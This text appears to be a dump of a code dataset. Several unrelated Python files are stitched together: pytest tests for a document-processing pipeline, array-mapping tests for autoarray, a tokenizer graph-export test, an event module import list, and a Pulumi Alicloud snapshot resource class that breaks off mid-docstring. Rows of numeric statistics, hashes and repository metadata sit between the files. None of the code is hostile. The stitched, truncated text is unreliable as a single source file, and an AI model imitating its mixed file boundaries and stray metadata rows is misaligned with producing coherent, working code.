# -----------------------------------------------------------------------------
def test_run_action_process_all_complete_auxiliary_empty(fxtr_setup_empty_db_and_inbox):
"""Test RUN_ACTION_PROCESS_ALL_COMPLETE - empty."""
cfg.glob.logger.debug(cfg.glob.LOGGER_START)
# -------------------------------------------------------------------------
pytest.helpers.copy_files_4_pytest_2_dir(
source_files=[
("empty_docx", "docx"),
("empty_jpg", "jpg"),
("empty_pdf_scanned", "pdf"),
("empty_pdf_text", "pdf"),
],
target_path=cfg.glob.setup.directory_inbox,
)
# -------------------------------------------------------------------------
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_ALL_COMPLETE])
# -------------------------------------------------------------------------
cfg.glob.logger.debug(cfg.glob.LOGGER_END)
# -----------------------------------------------------------------------------
# Test RUN_ACTION_PROCESS_ALL_COMPLETE - delete_auxiliary_files = false.
# -----------------------------------------------------------------------------
def test_run_action_process_all_complete_auxiliary_kept(fxtr_setup_empty_db_and_inbox):
"""Test RUN_ACTION_PROCESS_ALL_COMPLETE - delete_auxiliary_files = false."""
cfg.glob.logger.debug(cfg.glob.LOGGER_START)
# -------------------------------------------------------------------------
pytest.helpers.copy_files_4_pytest_2_dir(
source_files=[
("docx_ok", "docx"),
("jpeg_pdf_text_ok", "jpeg"),
("pdf_scanned_ok", "pdf"),
("pdf_text_ok", "pdf"),
("translating_sql_into_relational_algebra_p01_02", "pdf"),
],
target_path=cfg.glob.setup.directory_inbox,
)
# -------------------------------------------------------------------------
values_original = pytest.helpers.backup_config_params(
cfg.cls_setup.Setup._DCR_CFG_SECTION_ENV_TEST,
[
(cfg.cls_setup.Setup._DCR_CFG_DELETE_AUXILIARY_FILES, "false"),
],
)
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_ALL_COMPLETE])
pytest.helpers.restore_config_params(
cfg.cls_setup.Setup._DCR_CFG_SECTION_ENV_TEST,
values_original,
)
# -------------------------------------------------------------------------
cfg.glob.logger.info("=========> test_run_action_process_all_complete_auxiliary_kept <=========")
pytest.helpers.verify_content_of_inboxes(
inbox_accepted=(
[],
[
"docx_ok_1.docx",
"docx_ok_1.line.json",
"docx_ok_1.line.xml",
"docx_ok_1.pdf",
"jpeg_pdf_text_ok_2.jpeg",
"jpeg_pdf_text_ok_2.line.json",
"jpeg_pdf_text_ok_2.line.xml",
"jpeg_pdf_text_ok_2.pdf",
"pdf_scanned_ok_3.pdf",
"pdf_scanned_ok_3_1.jpeg",
"pdf_scanned_ok_3_1.line.json",
"pdf_scanned_ok_3_1.line.xml",
"pdf_scanned_ok_3_1.pdf",
"pdf_text_ok_4.line.json",
"pdf_text_ok_4.line.xml",
"pdf_text_ok_4.pdf",
"translating_sql_into_relational_algebra_p01_02_5.pdf",
"translating_sql_into_relational_algebra_p01_02_5_0.line.json",
"translating_sql_into_relational_algebra_p01_02_5_0.line.xml",
"translating_sql_into_relational_algebra_p01_02_5_0.pdf",
"translating_sql_into_relational_algebra_p01_02_5_1.jpeg",
"translating_sql_into_relational_algebra_p01_02_5_1.pdf",
"translating_sql_into_relational_algebra_p01_02_5_2.jpeg",
"translating_sql_into_relational_algebra_p01_02_5_2.pdf",
],
),
)
# -------------------------------------------------------------------------
cfg.glob.logger.debug(cfg.glob.LOGGER_END)
# -----------------------------------------------------------------------------
# Test RUN_ACTION_PROCESS_ALL_COMPLETE - status: error.
# -----------------------------------------------------------------------------
def test_run_action_process_all_complete_auxiliary_status_error(fxtr_setup_empty_db_and_inbox):
"""Test RUN_ACTION_PROCESS_ALL_COMPLETE - status: error."""
cfg.glob.logger.debug(cfg.glob.LOGGER_START)
# -------------------------------------------------------------------------
values_original = pytest.helpers.backup_config_params(
cfg.cls_setup.Setup._DCR_CFG_SECTION_ENV_TEST,
[
(cfg.cls_setup.Setup._DCR_CFG_DELETE_AUXILIARY_FILES, "true"),
(cfg.cls_setup.Setup._DCR_CFG_TETML_PAGE, "false"),
(cfg.cls_setup.Setup._DCR_CFG_TETML_WORD, "false"),
],
)
# -------------------------------------------------------------------------
pytest.helpers.copy_files_4_pytest_2_dir(
source_files=[
("docx_ok", "docx"),
("jpeg_pdf_text_ok", "jpeg"),
("pdf_scanned_ok", "pdf"),
("pdf_text_ok", "pdf"),
],
target_path=cfg.glob.setup.directory_inbox,
)
# -------------------------------------------------------------------------
db.cls_run.Run.ID_RUN_UMBRELLA = 0
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_INBOX])
# -------------------------------------------------------------------------
cfg.glob.db_core = db.cls_db_core.DBCore()
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(6)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_PDF2IMAGE])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(4)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_TESSERACT])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(2)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_PANDOC])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(8)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_PDFLIB])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(13)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_PARSER])
# -------------------------------------------------------------------------
cfg.glob.action_curr = db.cls_action.Action.from_id(17)
cfg.glob.action_curr.action_status = db.cls_document.Document.DOCUMENT_STATUS_ERROR
cfg.glob.action_curr.persist_2_db()
dcr.main([dcr.DCR_ARGV_0, db.cls_run.Run.ACTION_CODE_TOKENIZE])
pytest.helpers.restore_config_params(
cfg.cls_setup.Setup._DCR_CFG_SECTION_ENV_TEST,
values_original,
)
# -------------------------------------------------------------------------
cfg.glob.logger.info("=========> test_run_action_process_all_complete_auxiliary_status_error <=========")
pytest.helpers.verify_content_of_inboxes(
inbox_accepted=(
[],
[
"docx_ok_1.docx",
"jpeg_pdf_text_ok_2.jpeg",
"pdf_scanned_ok_3.pdf",
"pdf_text_ok_4.pdf",
],
),
)
# -------------------------------------------------------------------------
cfg.glob.logger.debug(cfg.glob.LOGGER_END)
| 30.006547 | 109 | 0.377059 | 3,068 | 36,668 | 4.127119 | 0.063233 | 0.075975 | 0.089559 | 0.104486 | 0.920708 | 0.905623 | 0.885326 | 0.849708 | 0.802322 | 0.719634 | 0 | 0.034226 | 0.421512 | 36,668 | 1,221 | 110 | 30.031122 | 0.5627 | 0.142058 | 0 | 0.761639 | 0 | 0 | 0.196361 | 0.084328 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009311 | false | 0 | 0.011173 | 0 | 0.020484 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
71bb9bece8c4c513a8887270fd8620901a325828 | 10,976 | py | Python | test_autoarray/unit/util/test_mapper_util.py | Sketos/PyAutoArray | 72dc7e8d1c38786915f82a7e7284239e5ce87624 | [
"MIT"
] | null | null | null | test_autoarray/unit/util/test_mapper_util.py | Sketos/PyAutoArray | 72dc7e8d1c38786915f82a7e7284239e5ce87624 | [
"MIT"
] | null | null | null | test_autoarray/unit/util/test_mapper_util.py | Sketos/PyAutoArray | 72dc7e8d1c38786915f82a7e7284239e5ce87624 | [
"MIT"
] | null | null | null | import autoarray as aa
import numpy as np
import pytest
@pytest.fixture(name="three_pixels")
def make_three_pixels():
return np.array([[0, 0], [0, 1], [1, 0]])
@pytest.fixture(name="five_pixels")
def make_five_pixels():
return np.array([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]])
class TestMappingMatrix:
def test__3_image_pixels__6_pixel_pixels__sub_grid_1x1(self, three_pixels):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=6,
total_mask_pixels=3,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=1.0,
)
assert (
mapping_matrix
== np.array(
[
[1, 0, 0, 0, 0, 0], # Imaging pixel 0 maps to pix pixel 0.
[0, 1, 0, 0, 0, 0], # Imaging pixel 1 maps to pix pixel 1.
[0, 0, 1, 0, 0, 0],
]
)
).all() # Imaging pixel 2 maps to pix pixel 2
def test__5_image_pixels__8_pixel_pixels__sub_grid_1x1(self, five_pixels):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2, 7, 6])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2, 3, 4])
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=8,
total_mask_pixels=5,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=1.0,
)
assert (
mapping_matrix
== np.array(
[
[
1,
0,
0,
0,
0,
0,
0,
0,
], # Imaging image_to_pixel 0 and 3 mappers to pix pixel 0.
[
0,
1,
0,
0,
0,
0,
0,
0,
], # Imaging image_to_pixel 1 and 4 mappers to pix pixel 1.
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0],
]
)
).all() # Imaging image_to_pixel 2 and 5 mappers to pix pixel 2
def test__5_image_pixels__8_pixel_pixels__sub_grid_2x2__no_overlapping_pixels(
self, five_pixels
):
pixelization_1d_index_for_sub_mask_1d_index = np.array(
[0, 1, 2, 3, 1, 2, 3, 4, 2, 3, 4, 5, 7, 0, 1, 3, 6, 7, 4, 2]
)
mask_1d_index_for_sub_mask_1d_index = np.array(
[0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4]
)
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=8,
total_mask_pixels=5,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=0.25,
)
assert (
mapping_matrix
== np.array(
[
[0.25, 0.25, 0.25, 0.25, 0, 0, 0, 0],
[0, 0.25, 0.25, 0.25, 0.25, 0, 0, 0],
[0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0],
[0.25, 0.25, 0, 0.25, 0, 0, 0, 0.25],
[0, 0, 0.25, 0, 0.25, 0, 0.25, 0.25],
]
)
).all()
def test__5_image_pixels__8_pixel_pixels__sub_grid_2x2__include_overlapping_pixels(
self, five_pixels
):
pixelization_1d_index_for_sub_mask_1d_index = np.array(
[0, 0, 0, 1, 1, 1, 0, 0, 2, 3, 4, 5, 7, 0, 1, 3, 6, 7, 4, 2]
)
mask_1d_index_for_sub_mask_1d_index = np.array(
[0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4]
)
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=8,
total_mask_pixels=5,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=0.25,
)
assert (
mapping_matrix
== np.array(
[
[0.75, 0.25, 0, 0, 0, 0, 0, 0],
[0.5, 0.5, 0, 0, 0, 0, 0, 0],
[0, 0, 0.25, 0.25, 0.25, 0.25, 0, 0],
[0.25, 0.25, 0, 0.25, 0, 0, 0, 0.25],
[0, 0, 0.25, 0, 0.25, 0, 0.25, 0.25],
]
)
).all()
def test__3_image_pixels__6_pixel_pixels__sub_grid_4x4(self, three_pixels):
pixelization_1d_index_for_sub_mask_1d_index = np.array(
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
1,
1,
1,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
0,
1,
2,
3,
4,
5,
0,
1,
2,
3,
4,
5,
0,
1,
2,
3,
]
)
mask_1d_index_for_sub_mask_1d_index = np.array(
[
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
2,
]
)
mapping_matrix = aa.util.mapper.mapping_matrix_from_pixelization_1d_index_for_sub_mask_1d_index(
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
pixels=6,
total_mask_pixels=3,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
sub_fraction=1.0 / 16.0,
)
assert (
mapping_matrix
== np.array(
[
[0.75, 0.25, 0, 0, 0, 0],
[0, 0, 1.0, 0, 0, 0],
[0.1875, 0.1875, 0.1875, 0.1875, 0.125, 0.125],
]
)
).all()
class TestPixelSignals:
def test__x3_image_pixels_signals_1s__pixel_scale_1__pixel_signals_all_1s(self):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
galaxy_image = np.array([1.0, 1.0, 1.0])
pixel_signals = aa.util.mapper.adaptive_pixel_signals_from_images(
pixels=3,
signal_scale=1.0,
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
hyper_image=galaxy_image,
)
assert (pixel_signals == np.array([1.0, 1.0, 1.0])).all()
def test__x4_image_pixels_signals_1s__pixel_signals_still_all_1s(self):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2, 0])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2, 0])
galaxy_image = np.array([1.0, 1.0, 1.0, 1.0])
pixel_signals = aa.util.mapper.adaptive_pixel_signals_from_images(
pixels=3,
signal_scale=1.0,
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
hyper_image=galaxy_image,
)
assert (pixel_signals == np.array([1.0, 1.0, 1.0])).all()
def test__galaxy_flux_in_a_pixel_pixel_is_double_the_others__pixel_signal_is_1_others_a_half(
self
):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
galaxy_image = np.array([2.0, 1.0, 1.0])
pixel_signals = aa.util.mapper.adaptive_pixel_signals_from_images(
pixels=3,
signal_scale=1.0,
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
hyper_image=galaxy_image,
)
assert (pixel_signals == np.array([1.0, 0.5, 0.5])).all()
def test__same_as_above_but_pixel_scale_2__scales_pixel_signals(self):
pixelization_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
mask_1d_index_for_sub_mask_1d_index = np.array([0, 1, 2])
galaxy_image = np.array([2.0, 1.0, 1.0])
pixel_signals = aa.util.mapper.adaptive_pixel_signals_from_images(
pixels=3,
signal_scale=2.0,
pixelization_1d_index_for_sub_mask_1d_index=pixelization_1d_index_for_sub_mask_1d_index,
mask_1d_index_for_sub_mask_1d_index=mask_1d_index_for_sub_mask_1d_index,
hyper_image=galaxy_image,
)
assert (pixel_signals == np.array([1.0, 0.25, 0.25])).all()
| 32.093567 | 104 | 0.482325 | 1,470 | 10,976 | 3.168707 | 0.059864 | 0.057535 | 0.061185 | 0.059253 | 0.903177 | 0.891155 | 0.882568 | 0.87763 | 0.877201 | 0.876342 | 0 | 0.117479 | 0.42766 | 10,976 | 341 | 105 | 32.187683 | 0.624005 | 0.024872 | 0 | 0.725753 | 0 | 0 | 0.00215 | 0 | 0 | 0 | 0 | 0 | 0.0301 | 1 | 0.036789 | false | 0 | 0.010033 | 0.006689 | 0.060201 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
71cb91eca79a67ac89ff6ccb09d0b37e6c394f44 | 181 | py | Python | readme/tests/test_export_graphml.py | howl-anderson/MicroTokenizer | f0ad19ee42fc947f432dfcbe687a474ccc78c7c8 | [
"MIT"
] | 136 | 2018-06-12T14:30:05.000Z | 2022-03-25T09:50:33.000Z | readme/tests/test_export_graphml.py | howl-anderson/MicroTokenizer | f0ad19ee42fc947f432dfcbe687a474ccc78c7c8 | [
"MIT"
] | 5 | 2018-06-19T05:21:09.000Z | 2021-07-16T13:41:00.000Z | readme/tests/test_export_graphml.py | howl-anderson/MicroTokenizer | f0ad19ee42fc947f432dfcbe687a474ccc78c7c8 | [
"MIT"
] | 16 | 2018-09-19T13:33:42.000Z | 2021-06-02T03:30:31.000Z | def test_main():
from MicroTokenizer import dag_tokenizer
dag_tokenizer.graph_builder.build_graph("知识就是力量")
dag_tokenizer.graph_builder.write_graphml("output.graphml")
| 30.166667 | 63 | 0.79558 | 23 | 181 | 5.913043 | 0.652174 | 0.264706 | 0.25 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116022 | 181 | 5 | 64 | 36.2 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.110497 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e0e24cf810935cb59d063e8fa1d0f26277ddbde3 | 146 | py | Python | app/events/__init__.py | dominik-air/lol-afk-buddy | b9e76336803922bd5f60dac33ec34f471eea3422 | [
"MIT"
] | 1 | 2021-10-11T23:02:19.000Z | 2021-10-11T23:02:19.000Z | app/events/__init__.py | dominik-air/lol-afk-buddy | b9e76336803922bd5f60dac33ec34f471eea3422 | [
"MIT"
] | 2 | 2022-02-04T20:32:18.000Z | 2022-02-04T20:38:49.000Z | app/events/__init__.py | dominik-air/lol-afk-buddy | b9e76336803922bd5f60dac33ec34f471eea3422 | [
"MIT"
] | 1 | 2022-02-05T15:12:15.000Z | 2022-02-05T15:12:15.000Z | from .event import post_event
from .email_listener import setup_email_event_handlers
from .telegram_listener import setup_telegram_event_handlers
| 36.5 | 60 | 0.89726 | 21 | 146 | 5.809524 | 0.428571 | 0.229508 | 0.311475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082192 | 146 | 3 | 61 | 48.666667 | 0.910448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1cc231f0c6a1e7f99c5ec7b3be7bb592f47899a8 | 26,572 | py | Python | sdk/python/pulumi_alicloud/ecs/snapshot.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/ecs/snapshot.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/ecs/snapshot.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['SnapshotArgs', 'Snapshot']
@pulumi.input_type
class SnapshotArgs:
def __init__(__self__, *,
disk_id: pulumi.Input[str],
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
The set of arguments for constructing a Snapshot resource.
:param pulumi.Input[str] disk_id: The source disk ID.
:param pulumi.Input[str] description: Description of the snapshot. This description can have a string of 2 to 256 characters, It cannot begin with http:// or https://. Default value is null.
:param pulumi.Input[str] name: The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
:param pulumi.Input[str] resource_group_id: The ID of the resource group.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "disk_id", disk_id)
if category is not None:
pulumi.set(__self__, "category", category)
if description is not None:
pulumi.set(__self__, "description", description)
if force is not None:
pulumi.set(__self__, "force", force)
if instant_access is not None:
pulumi.set(__self__, "instant_access", instant_access)
if instant_access_retention_days is not None:
pulumi.set(__self__, "instant_access_retention_days", instant_access_retention_days)
if name is not None:
warnings.warn("""Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""", DeprecationWarning)
pulumi.log.warn("""name is deprecated: Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""")
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if retention_days is not None:
pulumi.set(__self__, "retention_days", retention_days)
if snapshot_name is not None:
pulumi.set(__self__, "snapshot_name", snapshot_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="diskId")
def disk_id(self) -> pulumi.Input[str]:
"""
The source disk ID.
"""
return pulumi.get(self, "disk_id")
@disk_id.setter
def disk_id(self, value: pulumi.Input[str]):
pulumi.set(self, "disk_id", value)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the snapshot. This description can have a string of 2 to 256 characters, It cannot begin with http:// or https://. Default value is null.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def force(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "force")
@force.setter
def force(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force", value)
@property
@pulumi.getter(name="instantAccess")
def instant_access(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "instant_access")
@instant_access.setter
def instant_access(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "instant_access", value)
@property
@pulumi.getter(name="instantAccessRetentionDays")
def instant_access_retention_days(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "instant_access_retention_days")
@instant_access_retention_days.setter
def instant_access_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instant_access_retention_days", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="retentionDays")
def retention_days(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "retention_days")
@retention_days.setter
def retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retention_days", value)
@property
@pulumi.getter(name="snapshotName")
def snapshot_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "snapshot_name")
@snapshot_name.setter
def snapshot_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _SnapshotState:
def __init__(__self__, *,
category: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_id: Optional[pulumi.Input[str]] = None,
force: Optional[pulumi.Input[bool]] = None,
instant_access: Optional[pulumi.Input[bool]] = None,
instant_access_retention_days: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
retention_days: Optional[pulumi.Input[int]] = None,
snapshot_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Input properties used for looking up and filtering Snapshot resources.
:param pulumi.Input[str] description: Description of the snapshot. This description can have a string of 2 to 256 characters, It cannot begin with http:// or https://. Default value is null.
:param pulumi.Input[str] disk_id: The source disk ID.
:param pulumi.Input[str] name: The name of the snapshot to be created. The name must be 2 to 128 characters in length. It must start with a letter and cannot start with http:// or https://. It can contain letters, digits, colons (:), underscores (_), and hyphens (-).
It cannot start with auto, because snapshot names starting with auto are recognized as automatic snapshots.
:param pulumi.Input[str] resource_group_id: The ID of the resource group.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
"""
if category is not None:
pulumi.set(__self__, "category", category)
if description is not None:
pulumi.set(__self__, "description", description)
if disk_id is not None:
pulumi.set(__self__, "disk_id", disk_id)
if force is not None:
pulumi.set(__self__, "force", force)
if instant_access is not None:
pulumi.set(__self__, "instant_access", instant_access)
if instant_access_retention_days is not None:
pulumi.set(__self__, "instant_access_retention_days", instant_access_retention_days)
if name is not None:
warnings.warn("""Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""", DeprecationWarning)
pulumi.log.warn("""name is deprecated: Field 'name' has been deprecated from provider version 1.120.0. New field 'snapshot_name' instead.""")
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if retention_days is not None:
pulumi.set(__self__, "retention_days", retention_days)
if snapshot_name is not None:
pulumi.set(__self__, "snapshot_name", snapshot_name)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
